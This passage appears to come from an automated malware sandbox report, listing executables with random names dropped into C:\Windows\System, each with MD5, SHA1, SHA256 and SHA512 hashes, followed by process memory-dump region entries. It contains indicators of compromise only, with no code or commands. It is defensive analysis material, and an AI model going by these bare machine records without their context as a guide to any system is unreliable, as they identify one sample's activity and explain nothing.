SHA1 0c6d065b21f6176548dbfd26e8e8fbfe40c33574
SHA256 265c9126f70dd5f8e335277e1d9b8677afc89eb7001817bf4c101a5b3e17f001
SHA512 5d1d1ab1b16bd52d09829d356925b5fc5d43f18c8ce892c346ec41b3449dee68ebd3ddbede9a87f2825ea41f724c93a9b1bbbef00ba64c988c4e46e3b82b7f7b

C:\Windows\System\zRdjWIB.exe

MD5 95a9b69e17dbd9e75f0a72991ab46a08
SHA1 dca63f96a992abf8f22faedb58ab921ef52606ce
SHA256 41d35a8ea5324f1370d5f8f383ad8083269c87eadb93c3db339754f78af93b89
SHA512 ae8906363f929fa7429b7ae7ca21ece1628d5de5f8db4093cd41d16e72090bed07ad932a3eef081014dc8f8adbe91dbc16aa84eadaf27b6948f452fdf5ef339a

C:\Windows\System\pGWkFmP.exe

MD5 b32bb5d5950cd49ae0ddb5eb2f0d22ae
SHA1 b1b3b334cd2edfad6f0b7a8791cafe504bf53fe8
SHA256 32b42118cee111fa3833792cf8e546ffade8c16072ecc40d5a38fc02c127e307
SHA512 fb9db9f0476b73ca53fbc71611034d45967b0490c8af9ba7e8b30ea34ab7c6d7e7bacb33896d0e1663604431a8fee1ac352c71d82349021d746a54dd4a49f82c

C:\Windows\System\ywMqHsX.exe

MD5 e0cf690a574fcff1ad3aea49297ad694
SHA1 bbd771eff3be8def3d4cb73b055c221efb592961
SHA256 367e7de3129bd858210dcbf0607ad3e4f021a919e79e9de5f416cddc686409f1
SHA512 177c1dbe3be7ba20f6b1d86ddcb971f402a5aac83140f0be5eef0f84ece4cbbeb6c9b1262f727201d5c6efe66bed7d7a29c00a056807a3675a9b3dfa5459e34c

C:\Windows\System\OIUAimD.exe

MD5 9f737065aa0bb7ab2295f8735ce5e4cf
SHA1 76612389204d3e72c72f9f0fb010cf1a20d19600
SHA256 663ccbb5e81993717c468474eebbdad988c46b519e57c75d25074dce60a3cf89
SHA512 6f029fb5dd8bf00e526fd095797e1d205fd394ff0abc27a130d1439bc7c860480018e9cec29c131ec06e1a80fef019fefedb285f31024debce464a83c9150903

memory/1268-121-0x00007FF640450000-0x00007FF640842000-memory.dmp

C:\Windows\System\mGKGJjv.exe

MD5 909557822bb879f1cbdd01784845729d
SHA1 d799ab755d4ceac1ec35fcea79615d6d3d8d8d3b
SHA256 f8a109669efc806192a1c3211fcb00b4afd4fb3a137968daea6c3e61a400cb02
SHA512 dc6c0730e309822d210d9a8400735ba59d19b28329f39723db06458e4f4ad443b065b8cd999a121868f056b2b6da58a4af5d669e2cf3ecacdd2bfffb886f39fd

C:\Windows\System\ziGqRsS.exe

MD5 93e9e84851fabf4f2ccd6cd41d9f9ab4
SHA1 7dd6fffa6fbec78e922ad81a6d2d7d9de1ba9bd3
SHA256 ef09612d4f4a504bb189ae713c1ea735044a3266312226c9af39db7bcad3024b
SHA512 eb0fee31757381035538ee162cbd3e51f4d0355afb233461cd39d5b546a396e38bba5235706d28865f08ee875f04e013f6a0997bf095bfbd33f77d078017d0ab

memory/836-107-0x0000012AE10C0000-0x0000012AE10E2000-memory.dmp

C:\Windows\System\mKaqiDk.exe

MD5 cab7ff702ae483f6108c8f6b21fef8d5
SHA1 6660ec67698ee1cec433b1ddc75fe7fcbf3e18fc
SHA256 8e6d21c36ac68146619cbf2933a4747c0fbf7dac295f9d5e6e73c3535137674e
SHA512 50986486fa1c7ee7a7eb50f9e45029c7ce529e4e18469ed7aedadfd09c733f7ac572f3f7691c0101f5ad9cdd8f190b82a5fe09869841d381c629d5f84296a7db

C:\Windows\System\ummmPka.exe

MD5 04de0ff5880c4fbb7689cff5e0b989f7
SHA1 b19858b5ec6bf42baff51a15e27533f7561771c1
SHA256 d27f0e8e51552dd2e2ba951b63a68808ddcd0101a69fac98d8b23f78b85b6cc0
SHA512 8a695a443e24353d1cad1b9d5b9117706b7f8cc9b3214f1b8ccb3f14a5e598a3ac27fb3400930e52c13dd91212ea3d2712688436f91e9bf9a891cdb84085e64d

C:\Windows\System\xbiLSzP.exe

MD5 c584651c18b61dd286ab83c938ca9b43
SHA1 983d8c482a43f69714b80836de2f2809e726c12c
SHA256 ff89d1233e653972247fe39d878ee47bd4d1ef283685c3840e0235e3f7f7e018
SHA512 e7feac60faa05a824768f511325c58fe26717b2a12e3e3e1fe51199461c5af6665e4e2a11039f651e14e50cd5b9bf54f0f0f521c9b27ef628a28687a7fb22cc6

C:\Windows\System\XmAibUO.exe

MD5 b1894974afca38b83ab382242524f984
SHA1 2e11bb9ab9dfffacca4543256fb3a158150d0411
SHA256 a5ac0d323cd03b82f873be27832aa224f52e9b39c6b06892668796cc7f88c994
SHA512 68f6c7c1e5862e964d85267d403436846537d9c85f69085da291233d7c0ad34e0b25470bb1610080fd59c01922f26819756944e1424e3dc698dd599e61544fbd

memory/3920-59-0x00007FF6A3630000-0x00007FF6A3A22000-memory.dmp

C:\Windows\System\fgrtKfx.exe

MD5 93ce64173c42359d132aad81238163f3
SHA1 e53a7204d86f08130103985966e71df91b066478
SHA256 10f3371a56c6bca0730be033905ed2d7c0b5d40646408fa2b763fb61f5551018
SHA512 a2970475091aa4131e57859edf1afdded09c10d64017b9aebe650dd4449fb760c3aa64fc48daf76541863d56af9712613ac3e8c22f8d7567b9452707d23a7146

memory/2888-53-0x00007FF6B8380000-0x00007FF6B8772000-memory.dmp

C:\Windows\System\ayLcyMh.exe

MD5 210bdff38a7e826e0534bd67bd8a3f5e
SHA1 bbf2e6643e9eb34c12a4fc57976cdd0e58c46bb8
SHA256 8ce6764e7f1acbe912b68f505a813ea913e1ff7cc8e6789bbe7f6188acdb64fe
SHA512 45638471b1a632c55c180f0215b71e753b1a39941cd7f94cce432cb184c390db2f9650a371ed6f28113ea13832a0be4787f9178b3770d8fef7f772f00b345ea5

memory/756-48-0x00007FF78A760000-0x00007FF78AB52000-memory.dmp

C:\Windows\System\LoLEqyl.exe

MD5 abd776ed2e59fe053ecfe97c254753f4
SHA1 6ed6b1493c7b0571acce032f73a4bd8c87fef3fc
SHA256 1c3af399d040778a791865a82ec3414e8612188777520a2760890206a2fa2ace
SHA512 a76ca135a8a76fbbb47dd3d650b5e36ce6e7e747c9c8b663a98b577f5c84b0d74cf8d0a0b2cd885117fe6ef1a79e2c6c38c269ffe289bbf6d3b39aec272afdf0

memory/3604-42-0x00007FF6BF200000-0x00007FF6BF5F2000-memory.dmp

memory/536-35-0x00007FF688AA0000-0x00007FF688E92000-memory.dmp

C:\Windows\System\WaSMBHp.exe

MD5 d50566c8b0080831ae4182b9f0d42dd7
SHA1 0cf921763001d5ffb225c36774293a7c0251a22c
SHA256 5817a33005bfb54361e518480300b5d0745566e5239e3f82c45cdf1b35274348
SHA512 423e3473b13f4ab568b4b9b4ac6d7401e5053c20243efaef47f04514c330c66289296301e01eb6b0bf99e6d1d773b43b449707a08cca6f9e296967a907a64b06

memory/2196-28-0x00007FF60BF40000-0x00007FF60C332000-memory.dmp

C:\Windows\System\MHBleQE.exe

MD5 190d7d9bd5cabe6e19d020789fb0e41b
SHA1 c6bd506a64654fa509567d7bd0363d15bfa1ab75
SHA256 0df42ab01836269740ff82a05498938e34cc273d0d3b35cbae3276e64663862a
SHA512 4e430afb7d34b22483527ebe271433d831986a39220ac1eb55cc7f6fbcae8672a90a80984ccad40f30a30752659fd00ece2c79fb804d7fbdec7c7bba64a53976

C:\Windows\System\uFqjMAQ.exe

MD5 f249cce64f1edf5dc7bee5be6e2d5ad9
SHA1 0d569e38ec2ee4118bd367894784a63582261e47
SHA256 c376b4c1019dfb02d31ea3137efb150405ef95ba0305dcf5e026248ffc8d7cc2
SHA512 fdeb5b006eba899c911e624dadfb6c7b2eb030236757e187df8ba8d194a5a42df30b590d0fcf3f859b2532e60fc00c33154f75c1e6481913447ff2fa15b08be2

memory/2388-1946-0x00007FF6D3560000-0x00007FF6D3952000-memory.dmp

memory/2196-1947-0x00007FF60BF40000-0x00007FF60C332000-memory.dmp

memory/3920-1949-0x00007FF6A3630000-0x00007FF6A3A22000-memory.dmp

memory/2388-1993-0x00007FF6D3560000-0x00007FF6D3952000-memory.dmp

memory/2196-1997-0x00007FF60BF40000-0x00007FF60C332000-memory.dmp

memory/944-1996-0x00007FF731C50000-0x00007FF732042000-memory.dmp

memory/536-1999-0x00007FF688AA0000-0x00007FF688E92000-memory.dmp

memory/756-2003-0x00007FF78A760000-0x00007FF78AB52000-memory.dmp

memory/3604-2002-0x00007FF6BF200000-0x00007FF6BF5F2000-memory.dmp

memory/4800-2013-0x00007FF6C7E30000-0x00007FF6C8222000-memory.dmp

memory/4416-2011-0x00007FF6E4160000-0x00007FF6E4552000-memory.dmp

memory/1268-2015-0x00007FF640450000-0x00007FF640842000-memory.dmp

memory/2888-2010-0x00007FF6B8380000-0x00007FF6B8772000-memory.dmp

memory/724-2007-0x00007FF7EDE60000-0x00007FF7EE252000-memory.dmp

memory/3920-2006-0x00007FF6A3630000-0x00007FF6A3A22000-memory.dmp

memory/2368-2022-0x00007FF7BF010000-0x00007FF7BF402000-memory.dmp

memory/3408-2023-0x00007FF6717C0000-0x00007FF671BB2000-memory.dmp

memory/1260-2025-0x00007FF658520000-0x00007FF658912000-memory.dmp

memory/2428-2027-0x00007FF6551F0000-0x00007FF6555E2000-memory.dmp

memory/1056-2029-0x00007FF653B90000-0x00007FF653F82000-memory.dmp

memory/2996-2020-0x00007FF6E0C30000-0x00007FF6E1022000-memory.dmp

memory/1540-2018-0x00007FF7E1720000-0x00007FF7E1B12000-memory.dmp

memory/3248-2046-0x00007FF6EFE10000-0x00007FF6F0202000-memory.dmp

memory/680-2042-0x00007FF7D7000000-0x00007FF7D73F2000-memory.dmp

memory/1332-2054-0x00007FF7AD420000-0x00007FF7AD812000-memory.dmp

memory/884-2048-0x00007FF6D8BD0000-0x00007FF6D8FC2000-memory.dmp

memory/1572-2044-0x00007FF654C70000-0x00007FF655062000-memory.dmp